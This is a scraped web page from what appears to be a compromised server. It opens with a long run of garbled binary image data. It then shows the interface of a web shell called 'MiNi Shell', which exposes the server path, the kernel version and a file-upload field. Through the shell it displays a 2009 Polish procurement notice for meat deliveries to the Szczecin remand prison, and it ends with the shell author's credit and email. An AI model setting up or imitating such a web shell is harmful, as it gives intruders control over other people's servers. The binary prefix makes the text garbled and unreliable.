JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090506/134890-N-2009.html

<p class="kh_header"><b>Szczecin: Dostawa mięsa I wędlin wieprzowych I wołowych oraz mięsa I wędlin drobiowych do Aresztu Śledczego w Szczecinie</b><br>
<b>Numer ogłoszenia: 134890 - 2009; data zamieszczenia: 06.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kaszubska 28, 70-952 Szczecin, woj. zachodniopomorskie, tel. 091 4809100, 4809151, 52, faks 091 4809260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa I wędlin wieprzowych I wołowych oraz mięsa I wędlin drobiowych do Aresztu Śledczego w Szczecinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet I:
Mięso, wędliny i podroby drobiowe:
mięso mielone drobiowe (świeże, pakowane w opakowania foliowe hermetycznie zamknięte)- 1200kg, CPV 15112220-4, PN-A-82011;
korpusy drobiowe (świeże) - 600kg, CPV 15112210-1, PN-A-86524;
kurczak udo ze skórą (świeży, ćwiartka tylna) - 1100kg, CPV 15112210-1, PN-A-86524;
kurczak piersi bez skóry (świeży) - 250kg, CPV 15112210-1, PN-A-86524;
mięso gulaszowe drobiowe (świeże) - 800kg, CPV 15112200-8, PN-A-86524;
indyk piersi bez skóry (świeży) - 500kg, CPV 15112210-1, PN-A-86524;
kiełbasa mortadela drobiowa (homogenizowana, parzona, wędzona lub nie, w osłonce sztucznej, o długości min. 20 cm i średnicy 60-70 mm) - 1100kg, CPV 15131135-0, PN-A-86526;
serdelki drobiowe (homogenizowane, parzone, wędzone, w osłonce sztucznej, o długości min. 13 cm i średnicy 20-25 mm) - 3000kg, CPV 15131135-0, PN-A-86526;
kiełbasa mazurska z indyka (średnio rozdrobniona, parzona, wędzona lub nie, w osłonce naturalnej, o długości min. 20 cm i średnicy 35-60 mm) - 2400kg, CPV 15131135-0, PN-A-86526;
kiełbasa jałowcowa z kurczaka (grubo rozdrobniona, parzona, wędzona, w osłonce sztucznej białkowej, o długości min. 15 cm i średnicy 40-50 mm) - 900kg, CPV 15131135-0, PN-A-86526;
polędwica z indyka (wyrób w osłonce sztucznej bezbarwnej, o długości min. 30 cm i średnicy 60-100 mm) - 1000kg, CPV 15131135-0, PN-A-86526;
pieczeń drobiowa (wyrób w osłonce sztucznej, o długości min. 15 cm, baton w kształcie kwadratu lub prostokąta) - 1500kg, CPV 15131135-0, PN-A-86526;
kiełbasa szynkowa z indyka (grubo rozdrobniona, parzona, wędzona lub nie, w osłonce sztucznej, o długości min. 25 cm i średnicy 100-110 mm) - 1800kg, CPV 15131135-0, PN-A-86526;
szynka z indyka (wyrób w osłonce sztucznej bezbarwnej, o długości min. 20 cm, baton w kształcie kwadratu lub prostokąta) - 1000kg, CPV 15131135-0, PN-A-86526;
mielonka drobiowa (wyrób w osłonce sztucznej, o długości min. 20 cm i średnicy 50-70 mm)  - 2300kg, CPV 15131135-0, PN-A-86526;
kiełbasa podsuszana z kurczaka (grubo rozdrobniona, parzona, wędzona, podsuszona, w osłonce sztucznej białkowej, o długości min. 25 cm i średnicy 45-60 mm) - 700kg, CPV 15131135-0, PN-A-86526;
pasztet z indyka (wyrób w osłonce sztucznej, w kształcie batoników po 200g) - 400kg, CPV 15131310-1, PN-A-86526;
wątróbki drobiowe (świeże) - 700kg, CPV 15112300-9, PN-A-86523.

Pakiet II:
Mięso, wędliny, podroby i konserwy wieprzowe i wołowe:
mięso mielone wieprzowo-wołowe (świeże, pakowane w opakowania foliowe hermetycznie zamknięte) - 1200kg, CPV 15113000-3, PN-A-82011;
karkówka wieprzowa (bez kości, świeża) - 200kg, CPV 15113000-3, PN-86/A-82002;
mięso gulaszowe wieprzowe (świeże) - 1400kg, CPV 15113000-3, PN-A-82011;
mięso wieprzowe schab (bez kości, świeże) - 700kg, CPV 15113000-3, PN-86/A-82002;
mięso wołowe extra (bez kości, świeże) - 400kg, CPV 15111100-0, PN-88/A-82003;
kości spożywcze (wieprzowe lub wołowe świeże) - 1100kg, CPV 15100000-9, PN-76/A-85712;
żeberka wieprzowe (paski, świeże) - 700kg, CPV 15113000-3, PN-86/A-82002;
kości wędzone spożywcze (wieprzowe lub wołowe)- 1100kg,  CPV 15113000-3, PN-A-82007;
smalec - 1000kg, CPV 15412100-0, PN-90/A-85802;
słonina wieprzowa (świeża) - 300kg, CPV 15412100-0, PN-86/A-82004;
wątroba wieprzowa (świeża) - 500kg, CPV 15114000-0, PN-86/A-82004;
flaki wołowe krojone (obgotowane) - 300kg, 15131600-1; PN-86/A-82004,
kaszanka (z kaszy gryczanej, w naturalnym jelicie wieprzowym) - 500kg, CPV 15131134-3, PN-86/A-82004;
salceson włoski (biały, wyrób w osłonce sztucznej w kształcie batonu o średnicy powyżej 75 mm i długości min. 20 cm) - 300kg, CPV 15114000-0, PN-86/A-82004;
salceson ozorkowy (czarny, wyrób w osłonce sztucznej w kształcie batonu o średnicy powyżej 75 mm i długości min. 20 cm) - 300kg, CPV 15114000-0, PN-86/A-82004;
kiełbasa zwyczajna (średnio rozdrobniona, wieprzowa, parzona, wędzona lub nie, w osłonce naturalnej, o długości 26-30 cm i średnicy 30-35 mm) - 5200kg, CPV 15131130-5, PN-A-82007;
parówki popularne (homogenizowane, wieprzowe, parzone, wędzone, w osłonce naturalnej, o długości 12-14cm i średnicy 30-35 mm)  - 1500kg, CPV 15131130-5, PN-A-82007;
kiełbasa mortadela z papryką (homogenizowana, wieprzowo - wołowa, parzona, wędzona lub nie, w osłonce sztucznej, o długości 30-40 cm i średnicy 70-85 mm) - 1000kg, CPV 15131130-5, PN-A-82007;
metka cebulowa (wyrób w osłonce sztucznej, w kształcie batoników po 200g) - 700kg, CPV 15131130-5, PN-A-82007;
parówki cielęce (homogenizowane, parzone, wędzone, w osłonce naturalnej, o długości min. 15 cm i średnicy 15-20 mm) - 800kg, CPV 15131130-5, PN-A-82007;
mielonka tyrolska (wyrób wieprzowy w osłonce sztucznej bezbarwnej, o długości min. 30 cm, baton w kształcie kwadratu lub prostokąta) - 1000kg, CPV 15131130-5, PN-A-82007;
kiełbasa wiejska (średnio rozdrobniona, wieprzowa, parzona, wędzona lub nie, w osłonce naturalnej, o długości min. 26 cm i średnicy użytej osłonki)  - 1300kg, CPV 15131130-5, PN-A-82007;
kiełbasa biała parzona (średnio rozdrobniona, wieprzowa, parzona, w osłonce naturalnej, o długości 12-14 cm i średnicy 30-35 mm) - 800kg, CPV 15131130-5, PN-A-82007;
kiełbasa krakowska parzona (grubo rozdrobniona, wieprzowo - wołowa, parzona, wędzona, w osłonce sztucznej, białkowej, o długości min. 20cm i średnicy 65-80 mm)  - 300kg, CPV 15131130-5, PN-A-82007;
kiełbasa podwawelska (grubo rozdrobniona, wieprzowo - wołowa, parzona, wędzona, w osłonce sztucznej, białkowej, o długości min. 20 cm i średnicy 50-60 mm)  - 300kg, CPV 15131130-5, PN-A-82007;
kiełbasa zielonogórska (średnio rozdrobniona, wieprzowa, parzona, wędzona lub nie, w osłonce naturalnej, o długości min. 26 cm i średnicy użytej osłonki) - 2000kg, CPV 15131130-5, PN-A-82007;
szynka familijna (wyrób wieprzowo  - wołowy, w osłonce sztucznej bezbarwnej, o długości min. 30 cm i średnicy 110-120 mm) - 900kg, CPV 15131130-5, PN-A-82007;
kiełbasa toruńska (średnio rozdrobniona, wieprzowo - wołowa, parzona, wędzona lub nie, w osłonce naturalnej, o długości 12-14 cm i średnicy 30-35 mm) - 1200kg, CPV 15131130-5, PN-A-82007..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.11.22.20-4, 15.11.30.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy potwierdzający spełnienie warunków:

1.1 Posiadający uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek poosiadania takich uprawnień;
1.2 Posiadający niezbędna wiedzę i doświadczenie oraz dysponujący potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
1.3 Znajdujący się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
1.4 Nie podlegający wykluczeniu z postępowania o udzielenie zamówienia.
  
2. Z ubiegania się o zamówienie publiczne wyklucza się wykonawców, którzy:

nie spełniają warunków udziału w postępowaniu o zamówienie publiczne, o których mowa w art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych.

3. Zamawiający odrzuca ofertę jeżeli:

3.1 jest niezgodną z ustawą lub jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, 
3.2 jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji 
3.3 zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,  
3.4 została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia lub niezaproszonego do składania ofert 
3.5 zawiera błędy w obliczeniu ceny;
3.6 wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3;
3.7 jest nieważna na podstawie odrębnych przepisów, 

4. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.

5. Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> A. Na ofertę składają się następujące dokumenty i załączniki:
a.1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę (załącznik nr I)
a.2) Formularz cenowy - wypełniony i podpisany przez wykonawcę (załącznik nr II)
a.3) Wzór umowy (załącznik nr III)
a.4)Oświadczenie wykonawcy o spełnianiu warunków udziału w postępowaniu (załącznik nr IV)
a.5) Formularz w przypadku powierzenia wykonania części lub całości zamówienia podwykonawcom - wypełniony i podpisany przez wykonawcę (załącznik nr V).

B. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Prawa zamówień publicznych składa następujące dokumenty:
 
  B.1)  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.  
  B.2) Dokumenty potwierdzające posiadanie uprawnień/pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.  
  B.3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.    
  
C. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej:

  C.1) Zamiast dokumentów, o których mowa w pkt. B.1), B.3), składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
 
D. Dokumenty wymagane w przypadku składania oferty wspólnej: 

D.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy.

  - Oferta winna zawierać: oświadczenia i dokumenty opisane w pkt VI B i VI C  dla każdego partnera z osobna, pozostałe dokumenty składane są wspólnie.   

E. Postanowienia dotyczące składanych dokumentów
E.1 Wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez Wykonawcę lub osobę / osoby uprawnione do podpisania oferty z dopiskiem -za zgodność z oryginałem-.

E.2 Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.sw.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: siedziba zamawiającego.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com